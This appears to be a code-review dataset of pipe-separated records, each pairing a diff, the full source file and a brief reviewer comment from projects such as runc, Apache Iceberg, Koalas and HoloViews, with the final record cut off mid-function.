fds, err := unix.ParseUnixRights(&scm[0])
if err != nil {
return err
}
master := os.NewFile(uintptr(fds[0]), "orphan-pts-master")
defer master.Close()
// While we can access console.master, using the API is a good idea.
if err := utils.SendFd(process.ConsoleSocket, master.Name(), master.Fd()); err != nil {
return err
}
}
return nil
}
func (c *linuxContainer) updateState(process parentProcess) (*State, error) {
if process != nil {
c.initProcess = process
}
state, err := c.currentState()
if err != nil {
return nil, err
}
err = c.saveState(state)
if err != nil {
return nil, err
}
return state, nil
}
func (c *linuxContainer) saveState(s *State) error {
f, err := os.Create(filepath.Join(c.root, stateFilename))
if err != nil {
return err
}
defer f.Close()
return utils.WriteJSON(f, s)
}
func (c *linuxContainer) deleteState() error {
return os.Remove(filepath.Join(c.root, stateFilename))
}
func (c *linuxContainer) currentStatus() (Status, error) {
if err := c.refreshState(); err != nil {
return -1, err
}
return c.state.status(), nil
}
// refreshState needs to be called to verify that the current state on the
// container is what is true. Because consumers of libcontainer can use it
// out of process we need to verify the container's status based on runtime
// information and not rely on our in process info.
func (c *linuxContainer) refreshState() error {
paused, err := c.isPaused()
if err != nil {
return err
}
if paused {
return c.state.transition(&pausedState{c: c})
}
t := c.runType()
switch t {
case Created:
return c.state.transition(&createdState{c: c})
case Running:
return c.state.transition(&runningState{c: c})
}
return c.state.transition(&stoppedState{c: c})
}
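// runType infers the container status from the init process: Stopped if the
// init process is gone, a zombie, or has been replaced (start-time mismatch);
// Created while the exec fifo created at container creation still exists;
// Running otherwise.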
func (c *linuxContainer) runType() Status {
if c.initProcess == nil {
return Stopped
}
pid := c.initProcess.pid()
stat, err := system.Stat(pid)
if err != nil {
return Stopped
}
if stat.StartTime != c.initProcessStartTime || stat.State == system.Zombie || stat.State == system.Dead {
return Stopped
}
// We'll create the exec fifo and block on it after the container is created,
// and delete it after the container is started.
if _, err := os.Stat(filepath.Join(c.root, execFifoFilename)); err == nil {
return Created
}
return Running
}
func (c *linuxContainer) isPaused() (bool, error) {
state, err := c.cgroupManager.GetFreezerState()
if err != nil {
return false, err
}
return state == configs.Frozen, nil
}
func (c *linuxContainer) currentState() (*State, error) {
var (
startTime uint64
externalDescriptors []string
pid = -1
)
if c.initProcess != nil {
pid = c.initProcess.pid()
startTime, _ = c.initProcess.startTime()
externalDescriptors = c.initProcess.externalDescriptors()
}
intelRdtPath, err := intelrdt.GetIntelRdtPath(c.ID())
if err != nil {
intelRdtPath = ""
}
state := &State{
BaseState: BaseState{
ID: c.ID(),
Config: *c.config,
InitProcessPid: pid,
InitProcessStartTime: startTime,
Created: c.created,
},
Rootless: c.config.RootlessEUID && c.config.RootlessCgroups,
CgroupPaths: c.cgroupManager.GetPaths(),
IntelRdtPath: intelRdtPath,
NamespacePaths: make(map[configs.NamespaceType]string),
ExternalDescriptors: externalDescriptors,
}
if pid > 0 {
for _, ns := range c.config.Namespaces {
state.NamespacePaths[ns.Type] = ns.GetPath(pid)
}
for _, nsType := range configs.NamespaceTypes() {
if !configs.IsNamespaceSupported(nsType) {
continue
}
if _, ok := state.NamespacePaths[nsType]; !ok {
ns := configs.Namespace{Type: nsType}
state.NamespacePaths[ns.Type] = ns.GetPath(pid)
}
}
}
return state, nil
}
func (c *linuxContainer) currentOCIState() (*specs.State, error) {
bundle, annotations := utils.Annotations(c.config.Labels)
state := &specs.State{
Version: specs.Version,
ID: c.ID(),
Bundle: bundle,
Annotations: annotations,
}
status, err := c.currentStatus()
if err != nil {
return nil, err
}
state.Status = status.String()
if status != Stopped {
if c.initProcess != nil {
state.Pid = c.initProcess.pid()
}
}
return state, nil
}
// orderNamespacePaths sorts namespace paths into a list of paths that we
// can setns in order.
func (c *linuxContainer) orderNamespacePaths(namespaces map[configs.NamespaceType]string) ([]string, error) {
paths := []string{}
for _, ns := range configs.NamespaceTypes() {
// Remove namespaces that we don't need to join.
if !c.config.Namespaces.Contains(ns) {
continue
}
if p, ok := namespaces[ns]; ok && p != "" {
// check if the requested namespace is supported
if !configs.IsNamespaceSupported(ns) {
return nil, newSystemError(fmt.Errorf("namespace %s is not supported", ns))
}
// only set to join this namespace if it exists
if _, err := os.Lstat(p); err != nil {
return nil, newSystemErrorWithCausef(err, "running lstat on namespace path %q", p)
}
// do not allow namespace path with comma as we use it to separate
// the namespace paths
if strings.ContainsRune(p, ',') {
return nil, newSystemError(fmt.Errorf("invalid path %s", p))
}
paths = append(paths, fmt.Sprintf("%s:%s", configs.NsName(ns), p))
}
}
return paths, nil
}
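// encodeIDMapping serializes ID mappings as one "containerID hostID size"
// triple per line (e.g. "0 1000 65536"), matching the text format accepted by
// /proc/<pid>/uid_map and /proc/<pid>/gid_map writes.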
func encodeIDMapping(idMap []configs.IDMap) ([]byte, error) {
data := bytes.NewBuffer(nil)
for _, im := range idMap {
line := fmt.Sprintf("%d %d %d\n", im.ContainerID, im.HostID, im.Size)
if _, err := data.WriteString(line); err != nil {
return nil, err
}
}
return data.Bytes(), nil
}
// bootstrapData encodes the necessary data in netlink binary format
// as an io.Reader.
// Consumer can write the data to a bootstrap program
// such as one that uses nsenter package to bootstrap the container's
// init process correctly, i.e. with correct namespaces, uid/gid
// mapping etc.
func (c *linuxContainer) bootstrapData(cloneFlags uintptr, nsMaps map[configs.NamespaceType]string) (io.Reader, error) {
// create the netlink message
r := nl.NewNetlinkRequest(int(InitMsg), 0)
// write cloneFlags
r.AddData(&Int32msg{
Type: CloneFlagsAttr,
Value: uint32(cloneFlags),
})
// write custom namespace paths
if len(nsMaps) > 0 {
nsPaths, err := c.orderNamespacePaths(nsMaps)
if err != nil {
return nil, err
}
r.AddData(&Bytemsg{
Type: NsPathsAttr,
Value: []byte(strings.Join(nsPaths, ",")),
})
}
// write namespace paths only when we are not joining an existing user ns
_, joinExistingUser := nsMaps[configs.NEWUSER]
if !joinExistingUser {
// write uid mappings
if len(c.config.UidMappings) > 0 {
if c.config.RootlessEUID && c.newuidmapPath != "" {
r.AddData(&Bytemsg{
Type: UidmapPathAttr,
Value: []byte(c.newuidmapPath),
})
}
b, err := encodeIDMapping(c.config.UidMappings)
if err != nil {
return nil, err
}
r.AddData(&Bytemsg{
Type: UidmapAttr,
Value: b,
})
}
// write gid mappings
if len(c.config.GidMappings) > 0 {
b, err := encodeIDMapping(c.config.GidMappings)
if err != nil {
return nil, err
}
r.AddData(&Bytemsg{
Type: GidmapAttr,
Value: b,
})
if c.config.RootlessEUID && c.newgidmapPath != "" {
r.AddData(&Bytemsg{
Type: GidmapPathAttr,
Value: []byte(c.newgidmapPath),
})
}
if requiresRootOrMappingTool(c.config) {
r.AddData(&Boolmsg{
Type: SetgroupAttr,
Value: true,
})
}
}
}
if c.config.OomScoreAdj != nil {
// write oom_score_adj
r.AddData(&Bytemsg{
Type: OomScoreAdjAttr,
Value: []byte(fmt.Sprintf("%d", *c.config.OomScoreAdj)),
})
}
// write rootless
r.AddData(&Boolmsg{
Type: RootlessEUIDAttr,
Value: c.config.RootlessEUID,
})
return bytes.NewReader(r.Serialize()), nil
}
// ignoreTerminateErrors returns nil if the given err matches an error known
// to indicate that the terminate occurred successfully or err was nil, otherwise
// err is returned unaltered.
func ignoreTerminateErrors(err error) error {
if err == nil {
return nil
}
s := err.Error()
switch {
case strings.Contains(s, "process already finished"), strings.Contains(s, "Wait was already called"):
return nil
}
return err
}
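// requiresRootOrMappingTool reports whether the configured GID mappings are
// anything other than a single mapping of container GID 0 to the caller's own
// effective GID; such mappings typically need root or a setuid newgidmap
// helper to write, and bootstrapData sets SetgroupAttr in that case.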
func requiresRootOrMappingTool(c *configs.Config) bool {
gidMap := []configs.IDMap{
{ContainerID: 0, HostID: os.Getegid(), Size: 1},
}
return !reflect.DeepEqual(c.GidMappings, gidMap)
}
| 1 | 19,361 | Does it make sense to check for "Created" here as well? Or should it return an error in such case? | opencontainers-runc | go |
@@ -93,7 +93,7 @@ public abstract class BaseMetastoreCatalog implements Catalog {
String baseLocation = location != null ? location : defaultWarehouseLocation(identifier);
Map<String, String> tableProperties = properties != null ? properties : Maps.newHashMap();
TableMetadata metadata = TableMetadata.newTableMetadata(schema, spec, baseLocation, tableProperties);
- return Transactions.createTableTransaction(ops, metadata);
+ return Transactions.createTableTransaction(identifier.name(), ops, metadata);
}
@Override | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.iceberg;
import com.google.common.base.Joiner;
import com.google.common.base.Preconditions;
import com.google.common.collect.Iterables;
import com.google.common.collect.MapMaker;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import java.io.IOException;
import java.util.Map;
import java.util.Set;
import org.apache.iceberg.catalog.Catalog;
import org.apache.iceberg.catalog.TableIdentifier;
import org.apache.iceberg.exceptions.AlreadyExistsException;
import org.apache.iceberg.exceptions.CommitFailedException;
import org.apache.iceberg.exceptions.NoSuchTableException;
import org.apache.iceberg.exceptions.RuntimeIOException;
import org.apache.iceberg.io.FileIO;
import org.apache.iceberg.util.Tasks;
import org.apache.iceberg.util.ThreadPools;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public abstract class BaseMetastoreCatalog implements Catalog {
private static final Logger LOG = LoggerFactory.getLogger(BaseMetastoreCatalog.class);
@Override
public Table createTable(
TableIdentifier identifier,
Schema schema,
PartitionSpec spec,
String location,
Map<String, String> properties) {
Preconditions.checkArgument(isValidIdentifier(identifier), "Invalid table identifier: %s", identifier);
TableOperations ops = newTableOps(identifier);
if (ops.current() != null) {
throw new AlreadyExistsException("Table already exists: " + identifier);
}
String baseLocation;
if (location != null) {
baseLocation = location;
} else {
baseLocation = defaultWarehouseLocation(identifier);
}
TableMetadata metadata = TableMetadata.newTableMetadata(
schema, spec, baseLocation, properties == null ? Maps.newHashMap() : properties);
ops.commit(null, metadata);
try {
return new BaseTable(ops, fullTableName(name(), identifier));
} catch (CommitFailedException ignored) {
throw new AlreadyExistsException("Table was created concurrently: " + identifier);
}
}
@Override
public Transaction newCreateTableTransaction(
TableIdentifier identifier,
Schema schema,
PartitionSpec spec,
String location,
Map<String, String> properties) {
Preconditions.checkArgument(isValidIdentifier(identifier), "Invalid table identifier: %s", identifier);
TableOperations ops = newTableOps(identifier);
if (ops.current() != null) {
throw new AlreadyExistsException("Table already exists: " + identifier);
}
String baseLocation = location != null ? location : defaultWarehouseLocation(identifier);
Map<String, String> tableProperties = properties != null ? properties : Maps.newHashMap();
TableMetadata metadata = TableMetadata.newTableMetadata(schema, spec, baseLocation, tableProperties);
return Transactions.createTableTransaction(ops, metadata);
}
@Override
public Transaction newReplaceTableTransaction(
TableIdentifier identifier,
Schema schema,
PartitionSpec spec,
String location,
Map<String, String> properties,
boolean orCreate) {
TableOperations ops = newTableOps(identifier);
if (!orCreate && ops.current() == null) {
throw new NoSuchTableException("No such table: " + identifier);
}
String baseLocation = location != null ? location : defaultWarehouseLocation(identifier);
Map<String, String> tableProperties = properties != null ? properties : Maps.newHashMap();
TableMetadata metadata = TableMetadata.newTableMetadata(schema, spec, baseLocation, tableProperties);
if (orCreate) {
return Transactions.createOrReplaceTableTransaction(ops, metadata);
} else {
return Transactions.replaceTableTransaction(ops, metadata);
}
}
@Override
public Table loadTable(TableIdentifier identifier) {
if (isValidIdentifier(identifier)) {
TableOperations ops = newTableOps(identifier);
if (ops.current() == null) {
// the identifier may be valid for both tables and metadata tables
if (isValidMetadataIdentifier(identifier)) {
return loadMetadataTable(identifier);
}
throw new NoSuchTableException("Table does not exist: %s", identifier);
}
return new BaseTable(ops, fullTableName(name(), identifier));
} else if (isValidMetadataIdentifier(identifier)) {
return loadMetadataTable(identifier);
} else {
throw new NoSuchTableException("Invalid table identifier: %s", identifier);
}
}
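// Resolves identifiers whose last component names a metadata table, e.g.
// "db.table.snapshots" or "db.table.history": the base table is loaded from
// the namespace levels and wrapped in the corresponding metadata table view.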
private Table loadMetadataTable(TableIdentifier identifier) {
String name = identifier.name();
MetadataTableType type = MetadataTableType.from(name);
if (type != null) {
TableIdentifier baseTableIdentifier = TableIdentifier.of(identifier.namespace().levels());
TableOperations ops = newTableOps(baseTableIdentifier);
if (ops.current() == null) {
throw new NoSuchTableException("Table does not exist: " + baseTableIdentifier);
}
Table baseTable = new BaseTable(ops, fullTableName(name(), baseTableIdentifier));
switch (type) {
case ENTRIES:
return new ManifestEntriesTable(ops, baseTable);
case FILES:
return new DataFilesTable(ops, baseTable);
case HISTORY:
return new HistoryTable(ops, baseTable);
case SNAPSHOTS:
return new SnapshotsTable(ops, baseTable);
case MANIFESTS:
return new ManifestsTable(ops, baseTable);
case PARTITIONS:
return new PartitionsTable(ops, baseTable);
case ALL_DATA_FILES:
return new AllDataFilesTable(ops, baseTable);
case ALL_MANIFESTS:
return new AllManifestsTable(ops, baseTable);
case ALL_ENTRIES:
return new AllEntriesTable(ops, baseTable);
default:
throw new NoSuchTableException("Unknown metadata table type: %s for %s", type, baseTableIdentifier);
}
} else {
throw new NoSuchTableException("Table does not exist: " + identifier);
}
}
private boolean isValidMetadataIdentifier(TableIdentifier identifier) {
return MetadataTableType.from(identifier.name()) != null &&
isValidIdentifier(TableIdentifier.of(identifier.namespace().levels()));
}
protected boolean isValidIdentifier(TableIdentifier tableIdentifier) {
// by default allow all identifiers
return true;
}
@Override
public String toString() {
return getClass().getSimpleName() + "(" + name() + ")";
}
protected abstract String name();
protected abstract TableOperations newTableOps(TableIdentifier tableIdentifier);
protected abstract String defaultWarehouseLocation(TableIdentifier tableIdentifier);
/**
* Drops all data and metadata files referenced by TableMetadata.
* <p>
* This should be called by dropTable implementations to clean up table files once the table has been dropped in the
* metastore.
*
* @param io a FileIO to use for deletes
* @param metadata the last valid TableMetadata instance for a dropped table.
*/
protected static void dropTableData(FileIO io, TableMetadata metadata) {
// Reads and deletes are done using Tasks.foreach(...).suppressFailureWhenFinished to complete
// as much of the delete work as possible and avoid orphaned data or manifest files.
Set<String> manifestListsToDelete = Sets.newHashSet();
Set<ManifestFile> manifestsToDelete = Sets.newHashSet();
for (Snapshot snapshot : metadata.snapshots()) {
manifestsToDelete.addAll(snapshot.manifests());
// add the manifest list to the delete set, if present
if (snapshot.manifestListLocation() != null) {
manifestListsToDelete.add(snapshot.manifestListLocation());
}
}
LOG.info("Manifests to delete: {}", Joiner.on(", ").join(manifestsToDelete));
// run all of the deletes
deleteFiles(io, manifestsToDelete);
Tasks.foreach(Iterables.transform(manifestsToDelete, ManifestFile::path))
.noRetry().suppressFailureWhenFinished()
.onFailure((manifest, exc) -> LOG.warn("Delete failed for manifest: {}", manifest, exc))
.run(io::deleteFile);
Tasks.foreach(manifestListsToDelete)
.noRetry().suppressFailureWhenFinished()
.onFailure((list, exc) -> LOG.warn("Delete failed for manifest list: {}", list, exc))
.run(io::deleteFile);
Tasks.foreach(metadata.file().location())
.noRetry().suppressFailureWhenFinished()
.onFailure((list, exc) -> LOG.warn("Delete failed for metadata file: {}", list, exc))
.run(io::deleteFile);
}
private static void deleteFiles(FileIO io, Set<ManifestFile> allManifests) {
// keep track of deleted files in a map that can be cleaned up when memory runs low
Map<String, Boolean> deletedFiles = new MapMaker()
.concurrencyLevel(ThreadPools.WORKER_THREAD_POOL_SIZE)
.weakKeys()
.makeMap();
Tasks.foreach(allManifests)
.noRetry().suppressFailureWhenFinished()
.executeWith(ThreadPools.getWorkerPool())
.onFailure((item, exc) -> LOG.warn("Failed to get deleted files: this may cause orphaned data files", exc))
.run(manifest -> {
try (ManifestReader reader = ManifestFiles.read(manifest, io)) {
for (ManifestEntry entry : reader.entries()) {
// intern the file path because the weak key map uses identity (==) instead of equals
String path = entry.file().path().toString().intern();
Boolean alreadyDeleted = deletedFiles.putIfAbsent(path, true);
if (alreadyDeleted == null || !alreadyDeleted) {
try {
io.deleteFile(path);
} catch (RuntimeException e) {
// this may happen if the map of deleted files gets cleaned up by gc
LOG.warn("Delete failed for data file: {}", path, e);
}
}
}
} catch (IOException e) {
throw new RuntimeIOException(e, "Failed to read manifest file: " + manifest.path());
}
});
}
private static String fullTableName(String catalogName, TableIdentifier identifier) {
StringBuilder sb = new StringBuilder();
if (catalogName.contains("/") || catalogName.contains(":")) {
// use / for URI-like names: thrift://host:port/db.table
sb.append(catalogName);
if (!catalogName.endsWith("/")) {
sb.append("/");
}
} else {
// use . for non-URI named catalogs: prod.db.table
sb.append(catalogName).append(".");
}
for (String level : identifier.namespace().levels()) {
sb.append(level).append(".");
}
sb.append(identifier.name());
return sb.toString();
}
}
| 1 | 19,559 | Did you mean to use `identifier.toString` here as well? | apache-iceberg | java |
@@ -1,6 +1,6 @@
-require 'spec_helper'
+require "rails_helper"
-describe Api::V1::UsersController, '#show' do
+describe Api::V1::UsersController, "#show", type: :controller do
it 'returns a 401 when users are not authenticated' do
get :show
expect(response.code).to eq "401" | 1 | require 'spec_helper'
describe Api::V1::UsersController, '#show' do
it 'returns a 401 when users are not authenticated' do
get :show
expect(response.code).to eq "401"
end
end
| 1 | 10,657 | interesting! didn't realize this was needed in RSpec 3 | thoughtbot-upcase | rb |
@@ -27,7 +27,7 @@ from databricks.koalas.base import _wrap_accessor_pandas, _wrap_accessor_spark
class DatetimeMethods(object):
"""Date/Time methods for Koalas Series"""
- def __init__(self, series: ks.Series):
+ def __init__(self, series: 'ks.Series'):
if not isinstance(series.spark_type, (DateType, TimestampType)):
raise ValueError(
"Cannot call DatetimeMethods on type {}" | 1 | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Date/Time related functions on Koalas Series
"""
import pandas as pd
import pyspark.sql.functions as F
from pyspark.sql.types import DateType, TimestampType, LongType, StringType
import databricks.koalas as ks
from databricks.koalas.base import _wrap_accessor_pandas, _wrap_accessor_spark
class DatetimeMethods(object):
"""Date/Time methods for Koalas Series"""
def __init__(self, series: ks.Series):
if not isinstance(series.spark_type, (DateType, TimestampType)):
raise ValueError(
"Cannot call DatetimeMethods on type {}"
.format(series.spark_type))
self._data = series
self.name = self._data.name
# Properties
@property
def date(self) -> ks.Series:
"""
Returns a Series of python datetime.date objects (namely, the date
part of Timestamps without timezone information).
"""
# TODO: Hit a weird exception
# syntax error in attribute name: `to_date(`start_date`)` with alias
return _wrap_accessor_spark(
self, lambda col: F.to_date(col)).alias(self.name)
@property
def time(self) -> ks.Series:
raise NotImplementedError()
@property
def timetz(self) -> ks.Series:
raise NotImplementedError()
@property
def year(self) -> ks.Series:
"""
The year of the datetime.
"""
return _wrap_accessor_spark(self, F.year, LongType()).alias(self.name)
@property
def month(self) -> ks.Series:
"""
The month of the timestamp as January = 1 December = 12.
"""
return _wrap_accessor_spark(self, F.month, LongType()).alias(self.name)
@property
def day(self) -> ks.Series:
"""
The days of the datetime.
"""
return _wrap_accessor_spark(
self, F.dayofmonth, LongType()).alias(self.name)
@property
def hour(self) -> ks.Series:
"""
The hours of the datetime.
"""
return _wrap_accessor_spark(self, F.hour, LongType()).alias(self.name)
@property
def minute(self) -> ks.Series:
"""
The minutes of the datetime.
"""
return _wrap_accessor_spark(self, F.minute, LongType()).alias(self.name)
@property
def second(self) -> ks.Series:
"""
The seconds of the datetime.
"""
return _wrap_accessor_spark(self, F.second, LongType()).alias(self.name)
@property
def millisecond(self) -> ks.Series:
"""
The milliseconds of the datetime.
"""
return _wrap_accessor_pandas(
self, lambda x: x.dt.millisecond, LongType()).alias(self.name)
@property
def microsecond(self) -> ks.Series:
"""
The microseconds of the datetime.
"""
return _wrap_accessor_pandas(
self, lambda x: x.dt.microsecond, LongType()).alias(self.name)
@property
def nanosecond(self) -> ks.Series:
raise NotImplementedError()
@property
def week(self) -> ks.Series:
"""
The week ordinal of the year.
"""
return _wrap_accessor_spark(self, F.weekofyear, LongType()).alias(self.name)
@property
def weekofyear(self) -> ks.Series:
return self.week
weekofyear.__doc__ = week.__doc__
@property
def dayofweek(self) -> ks.Series:
"""
The day of the week with Monday=0, Sunday=6.
Return the day of the week. It is assumed the week starts on
Monday, which is denoted by 0 and ends on Sunday which is denoted
by 6. This method is available on both Series with datetime
values (using the `dt` accessor) or DatetimeIndex.
Returns
-------
Series or Index
Containing integers indicating the day number.
See Also
--------
Series.dt.dayofweek : Alias.
Series.dt.weekday : Alias.
Series.dt.day_name : Returns the name of the day of the week.
Examples
--------
>>> s = ks.from_pandas(pd.date_range('2016-12-31', '2017-01-08', freq='D').to_series())
>>> s.dt.dayofweek
2016-12-31 5
2017-01-01 6
2017-01-02 0
2017-01-03 1
2017-01-04 2
2017-01-05 3
2017-01-06 4
2017-01-07 5
2017-01-08 6
Name: 0, dtype: int64
"""
return _wrap_accessor_pandas(
self, lambda s: s.dt.dayofweek, LongType()).alias(self._data.name)
@property
def weekday(self) -> ks.Series:
return self.dayofweek
weekday.__doc__ = dayofweek.__doc__
@property
def dayofyear(self) -> ks.Series:
"""
The ordinal day of the year.
"""
return _wrap_accessor_pandas(
self, lambda s: s.dt.dayofyear, LongType()).alias(self._data.name)
# Methods
def strftime(self, date_format) -> ks.Series:
"""
Convert to a String Series using specified date_format.
"""
return _wrap_accessor_pandas(
self,
lambda x: x.dt.strftime(date_format),
StringType()
).alias(self.name)
| 1 | 9,779 | This is to avoid circular reference | databricks-koalas | py |
@@ -93,6 +93,9 @@ class MPLRenderer(Renderer):
'nbagg': (NbAggJupyterComm, None),
'mpld3': (JupyterComm, mpld3_msg_handler)}
+ # Whether in a notebook context
+ _notebook = False
+
def __call__(self, obj, fmt='auto'):
"""
Render the supplied HoloViews component or MPLPlot instance | 1 | import sys
from io import BytesIO
from tempfile import NamedTemporaryFile
from contextlib import contextmanager
from itertools import chain
import matplotlib as mpl
from matplotlib import pyplot as plt
from matplotlib.transforms import Bbox, TransformedBbox, Affine2D
import param
from param.parameterized import bothmethod
from ...core import HoloMap
from ...core.options import Store
from ..renderer import Renderer, MIME_TYPES
from .comms import (JupyterComm, NbAggJupyterComm,
mpl_msg_handler, mpld3_msg_handler)
from .widgets import MPLSelectionWidget, MPLScrubberWidget
from .util import get_tight_bbox
class OutputWarning(param.Parameterized):pass
outputwarning = OutputWarning(name='Warning')
class MPLRenderer(Renderer):
"""
Exporter used to render data from matplotlib, either to a stream
or directly to file.
The __call__ method renders a HoloViews component to raw data of
a specified matplotlib format. The save method is the
corresponding method for saving HoloViews objects to disk.
The save_fig and save_anim methods are used to save matplotlib
figure and animation objects. These match the two primary return
types of plotting classes implemented with matplotlib.
"""
drawn = {}
backend = param.String('matplotlib', doc="The backend name.")
dpi=param.Integer(72, doc="""
The render resolution in dpi (dots per inch)""")
fig = param.ObjectSelector(default='auto',
objects=['png', 'svg', 'pdf', 'html', None, 'auto'], doc="""
Output render format for static figures. If None, no figure
rendering will occur. """)
holomap = param.ObjectSelector(default='auto',
objects=['widgets', 'scrubber', 'webm','mp4', 'gif', None, 'auto'], doc="""
Output render multi-frame (typically animated) format. If
None, no multi-frame rendering will occur.""")
interactive = param.Boolean(default=False, doc="""
Whether to enable interactive plotting, allowing plots to be
displayed by explicitly calling show.""")
mode = param.ObjectSelector(default='default',
objects=['default', 'mpld3', 'nbagg'], doc="""
The 'mpld3' mode uses the mpld3 library whereas the 'nbagg' uses
matplotlib's the experimental nbagg backend. """)
# <format name> : (animation writer, format, anim_kwargs, extra_args)
ANIMATION_OPTS = {
'webm': ('ffmpeg', 'webm', {},
['-vcodec', 'libvpx', '-b', '1000k']),
'mp4': ('ffmpeg', 'mp4', {'codec': 'libx264'},
['-pix_fmt', 'yuv420p']),
'gif': ('imagemagick', 'gif', {'fps': 10}, []),
'scrubber': ('html', None, {'fps': 5}, None)
}
mode_formats = {'fig':{'default': ['png', 'svg', 'pdf', 'html', None, 'auto'],
'mpld3': ['html', 'json', None, 'auto'],
'nbagg': ['html', None, 'auto']},
'holomap': {m:['widgets', 'scrubber', 'webm','mp4', 'gif',
'html', None, 'auto']
for m in ['default', 'mpld3', 'nbagg']}}
counter = 0
# Define appropriate widget classes
widgets = {'scrubber': MPLScrubberWidget,
'widgets': MPLSelectionWidget}
# Define comm targets by mode
comms = {'default': (JupyterComm, mpl_msg_handler),
'nbagg': (NbAggJupyterComm, None),
'mpld3': (JupyterComm, mpld3_msg_handler)}
def __call__(self, obj, fmt='auto'):
"""
Render the supplied HoloViews component or MPLPlot instance
using matplotlib.
"""
plot, fmt = self._validate(obj, fmt)
if plot is None: return
if isinstance(plot, tuple(self.widgets.values())):
data = plot()
elif fmt in ['png', 'svg', 'pdf', 'html', 'json']:
with mpl.rc_context(rc=plot.fig_rcparams):
data = self._figure_data(plot, fmt, **({'dpi':self.dpi} if self.dpi else {}))
else:
if sys.version_info[0] == 3 and mpl.__version__[:-2] in ['1.2', '1.3']:
raise Exception("<b>Python 3 matplotlib animation support broken <= 1.3</b>")
with mpl.rc_context(rc=plot.fig_rcparams):
anim = plot.anim(fps=self.fps)
data = self._anim_data(anim, fmt)
data = self._apply_post_render_hooks(data, obj, fmt)
return data, {'file-ext':fmt,
'mime_type':MIME_TYPES[fmt]}
def show(self, obj):
"""
Renders the supplied object and displays it using the active
GUI backend.
"""
if self.interactive:
if isinstance(obj, list):
return [self.get_plot(o) for o in obj]
return self.get_plot(obj)
from .plot import MPLPlot
MPLPlot._close_figures = False
try:
plots = []
objects = obj if isinstance(obj, list) else [obj]
for o in obj:
plots.append(self.get_plot(o))
plt.show()
except:
MPLPlot._close_figures = True
raise
MPLPlot._close_figures = True
return plots[0] if len(plots) == 1 else plots
@classmethod
def plot_options(cls, obj, percent_size):
"""
Given a holoviews object and a percentage size, apply heuristics
to compute a suitable figure size. For instance, scaling layouts
and grids linearly can result in unwieldy figure sizes when there
are a large number of elements. As ad hoc heuristics are used,
this functionality is kept separate from the plotting classes
themselves.
Used by the IPython Notebook display hooks and the save
utility. Note that this can be overridden explicitly per object
using the fig_size and size plot options.
"""
from .plot import MPLPlot
factor = percent_size / 100.0
obj = obj.last if isinstance(obj, HoloMap) else obj
options = Store.lookup_options(cls.backend, obj, 'plot').options
fig_size = options.get('fig_size', MPLPlot.fig_size)*factor
return dict({'fig_size':fig_size},
**Store.lookup_options(cls.backend, obj, 'plot').options)
@bothmethod
def get_size(self_or_cls, plot):
w, h = plot.state.get_size_inches()
dpi = self_or_cls.dpi if self_or_cls.dpi else plot.state.dpi
return (int(w*dpi), int(h*dpi))
def diff(self, plot):
"""
Returns the latest plot data to update an existing plot.
"""
data = None
if self.mode != 'nbagg':
if self.mode == 'mpld3':
figure_format = 'json'
elif self.fig == 'auto':
figure_format = self.params('fig').objects[0]
else:
figure_format = self.fig
data = self.html(plot, figure_format, comm=False)
return data
def _figure_data(self, plot, fmt='png', bbox_inches='tight', **kwargs):
"""
Render matplotlib figure object and return the corresponding data.
Similar to IPython.core.pylabtools.print_figure but without
any IPython dependency.
"""
fig = plot.state
if self.mode == 'nbagg':
manager = plot.comm.get_figure_manager()
if manager is None: return ''
self.counter += 1
manager.show()
return ''
elif self.mode == 'mpld3':
import mpld3
fig.dpi = self.dpi
mpld3.plugins.connect(fig, mpld3.plugins.MousePosition(fontsize=14))
if fmt == 'json':
return mpld3.fig_to_dict(fig)
else:
figid = "fig_el"+plot.comm.id if plot.comm else None
html = mpld3.fig_to_html(fig, figid=figid)
html = "<center>" + html + "<center/>"
if plot.comm:
comm, msg_handler = self.comms[self.mode]
msg_handler = msg_handler.format(comm_id=plot.comm.id)
return comm.template.format(init_frame=html,
msg_handler=msg_handler,
comm_id=plot.comm.id)
return html
traverse_fn = lambda x: x.handles.get('bbox_extra_artists', None)
extra_artists = list(chain(*[artists for artists in plot.traverse(traverse_fn)
if artists is not None]))
kw = dict(
format=fmt,
facecolor=fig.get_facecolor(),
edgecolor=fig.get_edgecolor(),
dpi=self.dpi,
bbox_inches=bbox_inches,
bbox_extra_artists=extra_artists
)
kw.update(kwargs)
# Attempts to precompute the tight bounding box
try:
kw = self._compute_bbox(fig, kw)
except:
pass
bytes_io = BytesIO()
fig.canvas.print_figure(bytes_io, **kw)
data = bytes_io.getvalue()
if fmt == 'svg':
data = data.decode('utf-8')
return data
def _anim_data(self, anim, fmt):
"""
Render a matplotlib animation object and return the corresponding data.
"""
(writer, _, anim_kwargs, extra_args) = self.ANIMATION_OPTS[fmt]
if extra_args != []:
anim_kwargs = dict(anim_kwargs, extra_args=extra_args)
if self.fps is not None: anim_kwargs['fps'] = max([int(self.fps), 1])
if self.dpi is not None: anim_kwargs['dpi'] = self.dpi
if not hasattr(anim, '_encoded_video'):
with NamedTemporaryFile(suffix='.%s' % fmt) as f:
anim.save(f.name, writer=writer, **anim_kwargs)
video = open(f.name, "rb").read()
return video
def _compute_bbox(self, fig, kw):
"""
Compute the tight bounding box for each figure once, reducing
number of required canvas draw calls from N*2 to N+1 as a
function of the number of frames.
Tight bounding box computing code here mirrors:
matplotlib.backend_bases.FigureCanvasBase.print_figure
as it hasn't been factored out as a function.
"""
fig_id = id(fig)
if kw['bbox_inches'] == 'tight':
if not fig_id in MPLRenderer.drawn:
fig.set_dpi(self.dpi)
